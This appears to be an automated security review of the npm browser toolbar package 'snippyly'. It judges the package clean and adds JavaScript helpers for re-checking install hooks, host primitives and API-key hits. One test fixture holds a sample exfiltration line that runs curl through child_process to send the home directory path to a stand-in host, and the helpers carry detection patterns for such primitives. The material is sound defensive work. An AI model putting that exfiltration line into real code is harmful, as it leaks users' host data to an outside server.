AI Security Review
scanned 4d ago · by lpm-firewall-ai
No confirmed malicious attack surface. The package is a browser toolbar/custom-element plugin that loads the remote Velt SDK assets it depends on and calls Superflow/Velt/Firebase services when a page embeds or configures it.
Static reason
One or more suspicious static signals were detected.
Trigger
Browser import or script inclusion with SUPERFLOW/snippyly configuration
Impact
Expected networked collaboration toolbar behavior; no source-grounded exfiltration or install-time execution confirmed
Mechanism
browser custom element and remote SDK loader
Rationale
Static inspection shows a bundled browser plugin with expected remote SDK/service calls and no install-time execution, host filesystem access, destructive behavior, credential harvesting, or unrelated exfiltration. Scanner hits are explained by bundled Firebase/Auth code, runtime toolbar configuration, and normal product endpoints.
Evidence
- package.json
- snippyly.js
- snippyly.min.js
Network endpoints (9)
- cdn.jsdelivr.net/npm/@veltdev/sdk@.../velt.js
- us-central1-snipply-sdk-staging.cloudfunctions.net/getprivatenpmpackagefile
- app.usesuperflow.com/assets/party-emoji.svg
- www.usesuperflow.com/features
- drive.google.com/uc?export=view&id=1QHXtKZg8I7-wIapZJDs-x8YenlHMvzP4
- drive.google.com/uc?export=view&id=19Q76zC8mmLXjnMoRqio6EVtfO4AoB-hm
- apis.google.com/js/api.js
- www.google.com/recaptcha/api.js
- www.google.com/recaptcha/enterprise.js?render=
Decision evidence
public snapshot: AI called this Clean at 90.0% confidence as Benign with low false-positive risk.
Evidence for block
- snippyly.js loads remote Velt SDK scripts at runtime from jsdelivr or snipply staging Cloud Functions.
- snippyly.js auto-defines browser custom elements and may append a superflow-toolbar when configured with API key attributes/window variables.
- snippyly.js includes bundled Firebase/Auth code with token, storage, and fetch primitives.
Evidence against
- package.json has no install/preinstall/postinstall lifecycle hooks and main is snippyly.js.
- No child_process, shell execution, filesystem writes, native binary loading, or AI-agent control-surface writes found.
- Network use is aligned with a browser Superflow/Snippyly collaboration toolbar plugin.
- API key/password/token strings are configuration fields or bundled Firebase/Auth implementation, not hardcoded credential exfiltration.
- snippyly.min.js appears to be a minified build of the same browser plugin surface.
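The "Evidence against" items above are each a mechanical check a reviewer can repeat before trusting the verdict: no install-time lifecycle scripts, no host-side primitives in a browser-only bundle, and runtime script loading confined to expected hosts. The following is an added example written for this review, not the scanner's code and not code from the snippyly package; the package.json objects, the bundle text, and the hosts cdn.example.com and collector.example.net are constructed stand-ins.

```javascript
// Added example, not the scanner's code and not from the snippyly package:
// a re-check of the "Evidence against" items over a package.json and a bundle.
// Every input below is constructed (hypothetical names and hosts).

const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// npm lifecycle scripts that execute on `npm install` of a registry tarball.
function installTimeHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS.filter((name) =>
    Object.prototype.hasOwnProperty.call(scripts, name));
}

// Host-side primitives a browser-only custom element has no reason to use.
// process.env alone is weak evidence: bundlers leave process.env.NODE_ENV behind.
const HOST_PRIMITIVES = [
  /require\(\s*["'](?:node:)?(?:child_process|fs|fs\/promises|os|net|vm)["']\s*\)/g,
  /\bchild_process\b/g,
  /\bprocess\.env\b/g,
  /\beval\s*\(/g,
];

function hostPrimitiveHits(src) {
  const hits = new Set();
  for (const re of HOST_PRIMITIVES) {
    for (const m of src.matchAll(re)) hits.add(m[0]);
  }
  return [...hits].sort();
}

// Hostnames assigned to a script element's .src at runtime (the remote SDK loader).
function remoteScriptHosts(src) {
  const hosts = new Set();
  const re = /\.src\s*=\s*["'`](https?:\/\/[^"'`\s]+)["'`]/g;
  for (const m of src.matchAll(re)) {
    try { hosts.add(new URL(m[1]).hostname); } catch (_) { /* malformed URL, skip */ }
  }
  return [...hosts].sort();
}

// Custom element tag names the bundle registers as soon as it is evaluated.
function definedCustomElements(src) {
  const re = /customElements\.define\(\s*["']([a-z][a-z0-9-]*)["']/g;
  return [...src.matchAll(re)].map((m) => m[1]);
}

function reviewBundle(pkg, src) {
  return {
    installTimeHooks: installTimeHooks(pkg),
    hostPrimitives: hostPrimitiveHits(src),
    remoteScriptHosts: remoteScriptHosts(src),
    customElements: definedCustomElements(src),
  };
}

// Constructed stand-ins for package.json and the bundle (not the real files).
const CLEAN_PKG = { name: "example-toolbar", main: "toolbar.js", scripts: { build: "rollup -c" } };
const HOOKED_PKG = { name: "example-toolbar", main: "toolbar.js", scripts: { postinstall: "node setup.js" } };

const CLEAN_SRC = `
class ExampleToolbar extends HTMLElement {
  connectedCallback() {
    const apiKey = this.getAttribute("api-key") || window.EXAMPLE_API_KEY;
    const s = document.createElement("script");
    s.src = "https://cdn.example.com/sdk/velt.js";
    document.head.appendChild(s);
  }
}
customElements.define("example-toolbar", ExampleToolbar);
`;

// The same bundle with the kind of host access the review says is absent.
const SUSPICIOUS_SRC = CLEAN_SRC + `
const cp = require("child_process");
cp.exec("curl https://collector.example.net/?h=" + btoa(process.env.HOME));
`;

console.log(JSON.stringify(reviewBundle(CLEAN_PKG, CLEAN_SRC), null, 2));
console.log(JSON.stringify(reviewBundle(HOOKED_PKG, SUSPICIOUS_SRC), null, 2));
```

The clean bundle reports no hooks, no host primitives, one remote script host and one registered element; the tampered variant surfaces the postinstall hook, the child_process require and the process.env read. The host list is what you compare against the "Network endpoints" section above: anything not on that list, or a host that can serve attacker-controlled content, is the point to escalate.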
Behavioral surface
ChildProcess · EnvironmentVars · Network · HighEntropyStrings · Minified · UrlStrings
Source & flagged code
3 flagged
snippyly.min.js
- line = 1545 · patternName = google_api_key · severity = high · matchedText = calc(${t...d=a`
- line = 1545 · patternName = google_api_key · severity = high · matchedText = calc(${t...d=a`
snippyly.js
- line = 1545 · patternName = google_api_key · severity = high · matchedText = calc(${t...d=r`
All three hits point at line 1545 of the two builds, and the visible part of each matched text is a template-literal fragment rather than a key literal; the middle of the match is truncated here, so confirm against the full line before closing the finding.
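Triaging a google_api_key hit comes down to two questions the rationale above answers in prose: does the flagged span actually contain a key in Google's format, and where do the bundle's apiKey values come from (a hardcoded literal, or runtime configuration read from element attributes and window variables). The following is an added example written for this review, not the scanner's code and not code from the snippyly package; the key, the sample bundle text and the element/window names are constructed, and the page's own matched text is truncated, so nothing here reproduces it.

```javascript
// Added example, not the scanner's code and not from the snippyly package:
// triage of "google_api_key" secret-pattern hits. Inputs are constructed; the
// matched text on this page is truncated, so nothing here reproduces it.

// Google API keys are "AIza" followed by 35 characters from [A-Za-z0-9_-].
const GOOGLE_API_KEY = /AIza[0-9A-Za-z_-]{35}/;

// Decide what a flagged span actually contains.
function classifyHit(matchedText) {
  const key = matchedText.match(GOOGLE_API_KEY);
  if (key) {
    // A Firebase web config apiKey shipped in a browser bundle is a project
    // identifier, not a secret; the follow-up is to confirm it is restricted in
    // Google Cloud, not to treat it as credential exfiltration.
    return { kind: "google-api-key-literal", key: key[0] };
  }
  if (/\$\{|calc\(/.test(matchedText)) {
    // Template-literal or CSS calc() text: a regex hit on syntax, not a key.
    return { kind: "template-literal-or-css", key: null };
  }
  return { kind: "needs-manual-review", key: null };
}

// For every apiKey assignment, is the value hardcoded or read from runtime
// configuration (element attributes / window variables)?
function apiKeySources(src) {
  const re = /\bapiKey\s*[:=]\s*([^,;\n}]+)/g;
  return [...src.matchAll(re)].map((m) => {
    const rhs = m[1].trim();
    if (/^["'`]/.test(rhs)) return { rhs, source: "literal" };
    if (/getAttribute\(|\bwindow\./.test(rhs)) return { rhs, source: "runtime-config" };
    return { rhs, source: "expression" };
  });
}

// Constructed samples (hypothetical key, element attribute and window variable).
const FAKE_KEY = "AIza" + "0".repeat(35);
const SAMPLE_HIT = "calc(${t}px)"; // plain double-quoted string, no interpolation
const SAMPLE_SRC = `
const cfg = { apiKey: el.getAttribute("api-key") || window.EXAMPLE_API_KEY, authDomain: "a.example" };
const firebaseConfig = { apiKey: "${FAKE_KEY}", projectId: "demo" };
`;

console.log(classifyHit(SAMPLE_HIT));
console.log(classifyHit(FAKE_KEY));
console.log(apiKeySources(SAMPLE_SRC));
```

The key-format check runs first on purpose: a truncated matched text such as the one on this page could still hide a real key in the elided middle, so syntax-looking context alone is not enough to dismiss a hit. A literal Firebase web key is expected in a browser bundle and is a configuration question (is the key restricted to the intended referrers and APIs), not an exfiltration finding.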
Findings
3 High · 2 Medium · 3 Low
- High · High Secret · snippyly.min.js
- High · Secret Pattern · snippyly.min.js
- High · Secret Pattern · snippyly.js
- Medium · Network
- Medium · Environment Vars
- Low · Scripts Present
- Low · High Entropy Strings
- Low · Url Strings